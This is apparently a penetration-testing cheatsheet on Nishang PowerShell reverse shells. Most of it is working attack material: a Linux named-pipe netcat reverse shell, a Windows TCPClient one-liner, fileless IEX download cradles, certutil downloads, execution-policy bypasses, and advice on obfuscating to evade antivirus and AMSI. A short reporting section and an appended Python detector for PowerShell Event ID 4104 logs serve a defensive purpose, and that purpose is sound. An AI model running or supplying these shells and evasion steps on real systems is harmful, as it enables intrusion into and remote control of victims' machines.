Methodology Checklist
- Load Nishang into PS session: Import-Module /path/to/Nishang.psm1
- List available scripts: Get-Command -Module Nishang
- Reverse shell: Invoke-PowerShellTcp -Reverse -IPAddress [LHOST] -Port [LPORT]
- Start nc listener before execution: nc -lvp [LPORT]
- Exfiltrate data: Invoke-Exfil, or use Out-File + file transfer
- Use Invoke-Encode to obfuscate PS commands if AV flags them
- Clean up: delete dropped scripts after use
Operational Context
Use when: Windows target with PowerShell access and AV that flags MSF payloads; Nishang PS1 scripts are often detected less often than compiled binaries.
Think Dumber First: Invoke-PowerShellTcp.ps1 is a one-liner reverse shell. Add the invoke call at the end of the script file and host it via Python HTTP. IEX (New-Object Net.WebClient).DownloadString('http://[LHOST]/shell.ps1') runs it with no file written to disk.
Skip when: AMSI is active and unpatched; AMSI will catch Nishang without a bypass.
Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f \| /bin/bash -i 2>&1 \| nc [TARGET_IP] 7777 > /tmp/f | Linux named pipe reverse shell payload |
| powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('[TARGET_IP]',443)..." | Windows fileless reverse shell payload |
| cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 shell.ps1 | Copy Nishang TCP shell script to working dir |
| echo "Invoke-PowerShellTcp -Reverse -IPAddress [TARGET_IP] -Port 4444" >> shell.ps1 | Append trigger to end of Nishang script |
| sudo python3 -m http.server 80 | Host the prepared payload on attacker web server |
| sudo nc -lvnp 4444 | Start listener to catch the Nishang shell |
| IEX(New-Object Net.WebClient).DownloadString('http://[TARGET_IP]/shell.ps1') | Fileless execution of Nishang payload (victim runs) |
| certutil.exe -urlcache -split -f "http://[TARGET_IP]/shell.ps1" C:\Windows\Temp\shell.ps1 | Download Nishang script to disk (LOLBAS method) |
| powershell -ep bypass -File C:\Windows\Temp\shell.ps1 | Execute downloaded script (bypass execution policy) |
| wget "http://[TARGET_IP]/shell.ps1" -OutFile "shell.ps1"; .\shell.ps1 | Download and run (PS alias wget) |
Deep Dive & Workflow
What is a Payload?
A payload is the code executed on the target after exploitation. From the defensive view, it is the specific string that AV scans for and blocks. From the offensive view, it is the set of instructions given to the victim machine.
Linux: Named Pipe Payload Breakdown
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc 10.10.14.12 7777 > /tmp/f
- mkfifo /tmp/f → named pipe acts as a bidirectional data buffer
- cat /tmp/f | → feeds pipe content to bash as commands
- /bin/bash -i 2>&1 → interactive bash, stderr merged into stdout
- nc 10.10.14.12 7777 > /tmp/f → nc sends output to the attacker; attacker input goes back into the pipe
Windows: PowerShell One-Liner Breakdown
The full one-liner creates a .NET TCPClient socket, reads attacker input in a loop, executes each command with iex, and sends the output back:
- $client.GetStream() → opens the network stream
- iex $data → executes whatever the attacker types
- $sendback2 → reconstructs the PS C:\path> prompt for a realistic terminal appearance
Nishang: The "Append & Host" Workflow
Nishang scripts define the function but don't call it. You must append the function call:
# 1. Copy to working directory
cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 shell.ps1
# 2. Append trigger (CRITICAL: use your tun0 IP)
echo "Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.158 -Port 4444" >> shell.ps1
# 3. Serve + listen simultaneously
sudo python3 -m http.server 80 &
sudo nc -lvnp 4444
Execution Method Comparison
| Method | Disk Write? | AV Risk | Use When |
|---|---|---|---|
| IEX + DownloadString | No (RAM) | Lower | Defender active, prefer fileless |
| certutil + PS | Yes | Higher | IEX blocked |
| wget/curl alias + run | Yes | Medium | Quick and easy lab method |
Context Awareness: Critical
| Shell Context | What to Run |
|---|---|
| CMD prompt (C:\Windows\system32>) | powershell -nop -c "$client = ..." |
| PowerShell prompt (PS C:\>) | $client = New-Object ... (drop the powershell prefix) |
Always identify your shell before pasting payloads: the wrong prefix causes syntax errors.
Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Nishang script detected by Defender | AMSI signature match | Obfuscate: rename functions, encode with base64, or invoke via AMSI bypass first |
| Invoke-PowerShellTcp hangs after connect | Firewall blocking outbound | Confirm outbound port open from target: Test-NetConnection [LHOST] -Port [LPORT] |
| Script download fails | PowerShell execution policy | Bypass: powershell -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://[LHOST]/shell.ps1')" |
| Shell connects but no command output | Encoding issue | Use UTF8: modify script to add [Console]::OutputEncoding = [System.Text.Encoding]::UTF8 |
| HTTP server returns 404 for PS1 file | Python server in wrong directory | Confirm: python3 -m http.server 80 in directory containing the script |
Reporting Trigger
Finding Title: PowerShell-Based Reverse Shell Execution via Nishang
Impact: Nishang PowerShell payloads provide fully interactive reverse shells without writing binaries to disk, evading AV solutions that scan the file system but not in-memory script execution.
Root Cause: PowerShell remoting and unrestricted download/execution policy. No AMSI monitoring or Script Block Logging enabled.
Recommendation: Enable PowerShell Constrained Language Mode. Configure AMSI with updated signatures. Enable Script Block Logging (Event ID 4104). Implement application allowlisting via AppLocker or WDAC.
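As an added defensive example (not part of the original cheatsheet): once Script Block Logging (Event ID 4104) is enabled as recommended above, a SOC needs detection logic over those records. This Python snippet matches the exact techniques this page describes (Invoke-PowerShellTcp, the .NET TCPClient one-liner, the IEX/DownloadString cradle, certutil -urlcache and -ep bypass). The event tuples and the 10.10.14.158 address are constructed sample data, not real logs; the indicator names are assumptions of this example.

```python
import re
from dataclasses import dataclass

# Indicator patterns drawn from the techniques on this page.
# Matching is case-insensitive because PowerShell cmdlet and .NET type
# names are case-insensitive.
INDICATORS = [
    ("nishang_tcp_shell", re.compile(r"Invoke-PowerShellTcp", re.I)),
    ("dotnet_tcpclient", re.compile(r"Net\.Sockets\.TCPClient", re.I)),
    ("download_cradle", re.compile(r"Net\.WebClient\)?\.DownloadString", re.I)),
    ("iex_download", re.compile(r"\biex\b.*DownloadString|DownloadString.*\biex\b", re.I)),
    ("certutil_urlcache", re.compile(r"certutil(\.exe)?\s+-urlcache", re.I)),
    ("exec_policy_bypass", re.compile(r"-(ep|ExecutionPolicy)\s+bypass", re.I)),
]

@dataclass
class Hit:
    record_id: int
    indicator: str
    excerpt: str  # the matched fragment, for the analyst's triage view

def scan_script_block(record_id, text):
    """Return one Hit per indicator that fires on a single ScriptBlockText."""
    hits = []
    for name, rx in INDICATORS:
        m = rx.search(text)
        if m:
            hits.append(Hit(record_id, name, m.group(0)[:60]))
    return hits

def scan_events(events):
    """events: iterable of (record_id, event_id, script_block_text).
    Only 4104 (script block) records are inspected; other IDs are skipped."""
    hits = []
    for record_id, event_id, text in events:
        if event_id != 4104:
            continue
        hits.extend(scan_script_block(record_id, text))
    return hits

# Constructed sample records (not real logs); 104 is deliberately a 4103 event.
SAMPLE_EVENTS = [
    (101, 4104, "Get-ChildItem C:\\Users | Select-Object Name"),
    (102, 4104, "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.158/shell.ps1')"),
    (103, 4104, "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.158',443)"),
    (104, 4103, "Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.158 -Port 4444"),
    (105, 4104, "powershell -ep bypass -File C:\\Windows\\Temp\\shell.ps1"),
]

if __name__ == "__main__":
    for h in scan_events(SAMPLE_EVENTS):
        print(f"record {h.record_id}: {h.indicator} -> {h.excerpt}")
```

Record 104 is skipped because the filter only inspects 4104; in production, also ingest 4103 (module logging) if you want Nishang's function name caught when the call is logged there.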